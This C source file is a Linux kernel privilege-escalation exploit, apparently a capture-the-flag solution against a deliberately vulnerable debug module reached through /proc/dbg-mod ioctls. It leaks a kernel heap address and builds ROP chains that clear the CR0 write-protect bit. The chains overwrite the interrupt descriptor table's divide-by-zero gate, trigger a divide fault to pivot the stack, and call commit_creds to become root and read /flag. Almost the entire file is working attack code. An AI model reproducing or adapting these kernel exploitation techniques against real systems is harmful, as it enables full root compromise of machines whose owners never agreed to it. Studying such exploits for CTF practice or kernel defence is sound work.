#define _GNU_SOURCE
#include <string.h>
#include <stdio.h>
#include <fcntl.h>
#include <stdint.h>
#include <unistd.h>
#include <assert.h>
#include <stdlib.h>
#include <signal.h>
#include <poll.h>
#include <pthread.h>
#include <err.h>
#include <errno.h>
#include <sched.h>
#include <linux/bpf.h>
#include <linux/filter.h>
#include <linux/userfaultfd.h>
#include <linux/prctl.h>
#include <sys/syscall.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/prctl.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/xattr.h>
#include <sys/socket.h>
#include <sys/uio.h>
#include <x86intrin.h>

#include "offsets.h"

int fd;
unsigned long kbase, heap;
unsigned long user_cs, user_ss, user_sp, user_rflags;
unsigned long page_size;
cpu_set_t pwn_cpu;
uint64_t user_rip;

void fatal(const char* msg){
    perror(msg);
    exit(1);
}

void from_kernel() {
    int uid = getuid();
    printf("[from_kernel]: current uid = %d\n", uid);

    char flag[0x20] = {0};
    int flag_fd = open("/flag", O_RDONLY);
    read(flag_fd, flag, sizeof(flag));
    printf("[from_kernel]: got flag = %s\n", flag);

    while (1) {}
}

void save_state(){
    __asm__(
        ".intel_syntax noprefix;"
        "mov user_cs,cs;"
        "mov user_ss,ss;"
        "mov user_sp,rsp;"
        "pushf;"
        "pop user_rflags;"
        ".att_syntax;"
    );
}

void pin_cpu(int cpu)
{
    cpu_set_t my_set;
    CPU_ZERO(&my_set);
    CPU_SET(cpu, &my_set);
    sched_setaffinity(0, sizeof(my_set), &my_set);
}

typedef struct
{
    uint64_t src;
    uint64_t dst;
} arb_read_req;

struct arb_call_req {
    uint64_t *size;
    char *chain;
};

struct arb_call_req call_req = {0};

void rip_control(void *chain, uint64_t size)
{

    call_req.size = &size;
    call_req.chain = chain;

    ioctl(fd, 1339, &call_req);
}

uint64_t get_heap_leak(void *chain, uint64_t size)
{
    call_req.size = &size;
    call_req.chain = chain;
    ioctl(fd, 1342, &call_req);
    return (uint64_t)call_req.chain;
}

uint64_t disable_write_prot(uint64_t cr0){
    return cr0 & ~0x10000;
}

typedef uint16_t u16;
typedef uint32_t u32;

struct idt_bits {
	u16		ist	: 3,
			zero	: 5,
			type	: 5,
			dpl	: 2,
			p	: 1;
} __attribute__((packed));

struct gate_struct {
	u16		offset_low;
	u16		segment;
	struct idt_bits	bits;
	u16		offset_middle;
	u32		offset_high;
	u32		reserved;
} __attribute__((packed));

void change_idt(struct gate_struct *idt, uint64_t addr){
    idt->offset_low = addr & 0xffff;
    idt->offset_middle = (addr >> 16) & 0xffff;
    idt->offset_high = (addr >> 32) & 0xffffffff;
}

void usermode_stuff(){
    printf("[+] usermode\n");

    /*
    Setup so that we can use the following gadget:

    1. push rbp; xor eax, 0x9be882a7; call rbx; // Gets swapgs_regs_restore_and_return_to_usermode on stack
    2. mov rsp, rbp; pop rbp; ret;
    */

    __asm__(
        ".intel_syntax noprefix;"
        "mov rax, 0xdeadbeef;"
        "mov rbx, mov_rsp_rbp;"
        "mov rcx, 0xdeadbeef;"
        "mov rdx, 0xdeadbeef;"

        "mov rdi, init_cred;"
        "mov rsi, 0xdeadbeef;"

        "mov r8, 0xdeadbeef;"
        "mov r9, 0xdeadbeef;"
        "mov r10, 0xdeadbeef;"
        "mov r11, 0xdeadbeef;"
        "mov r12, 0xdeadbeef;"
        "mov r13, 0xdeadbeef;"
        "mov r14, commit_creds;"
        "mov r15, 0;"

        "mov rbp, heap;"
        "xor eax, 0x9be882a7;"

        "cdq;"
        "idiv r15;"

        ".att_syntax;"
    );
}


int main(){
    save_state();
    pin_cpu(0);
    signal(SIGSEGV, from_kernel);

    fd = open("/proc/dbg-mod", O_RDWR);
    if (fd < 0)
        fatal("fd");


    printf("[+] fd: %d\n", fd);

    uint64_t idt_base = 0xfffffe0000000000;


    /* Value of idt entry for divide by zero interrupt */
    // 0x00000000ffffffff82208e0000100950
    __uint128_t idt_value = ((__uint128_t)0xffffffff82208e00 << 32) | 0x0000000000100950; // Value which is affected by kaslr
    struct gate_struct *idt = (struct gate_struct *)&idt_value;

    change_idt(idt, push_rbp_call_rbx);

    uint64_t *page_rip_chain = mmap(0, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    uint64_t *page_heap_chain = mmap(0, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    uint64_t *chain = page_heap_chain;

    chain = page_heap_chain;
    *chain++ = ret;
    *chain++ = ret;
    *chain++ = ret;
    *chain++ = ret;
    *chain++ = ret;
    *chain++ = ret;
    *chain++ = ret;
    *chain++ = ret;
    *chain++ = ret;
    *chain++ = ret;
    *chain++ = ret;
    *chain++ = ret;
    *chain++ = ret;
    *chain++ = ret;
    *chain++ = ret;
    *chain++ = ret;
    *chain++ = ret;
    *chain++ = ret;
    *chain++ = ret;
    *chain++ = swapgs_ret;
    *chain++ = 0x0;
    *chain++ = commit_creds;
    *chain++ = ret;
    *chain++ = swapgs;
    *chain++ = 0xdeadbeef;
    *chain++ = 0xdeadbeef;

    *chain++ = (uint64_t)&from_kernel;
    *chain++ = user_cs;
    *chain++ = user_rflags;
    *chain++ = user_sp;
    *chain++ = user_ss;


    heap = get_heap_leak(page_heap_chain, 0x200);
    printf("[+] kheap_leak: 0x%lx\n", heap);

    chain = page_rip_chain;
    *chain++ = pop_rbx;
    *chain++ = disable_write_prot(0x80050033);
    *chain++ = rip;
    *chain++ = 0xdeadbeef;
    *chain++ = pop_rdi;
    *chain++ = idt_base;
    *chain++ = pop_rax;
    *chain++ = idt_value & 0xffffffffffffffff;
    *chain++ = storesq_rdi;
    *chain++ = swapgs;
    *chain++ = 0xdeadbeef;
    *chain++ = 0xdeadbeef;

    *chain++ = (uint64_t)&usermode_stuff;
    *chain++ = user_cs;
    *chain++ = user_rflags;
    *chain++ = user_sp;
    *chain++ = user_ss;


    rip_control(page_rip_chain, 0x100);

    return 0;
}
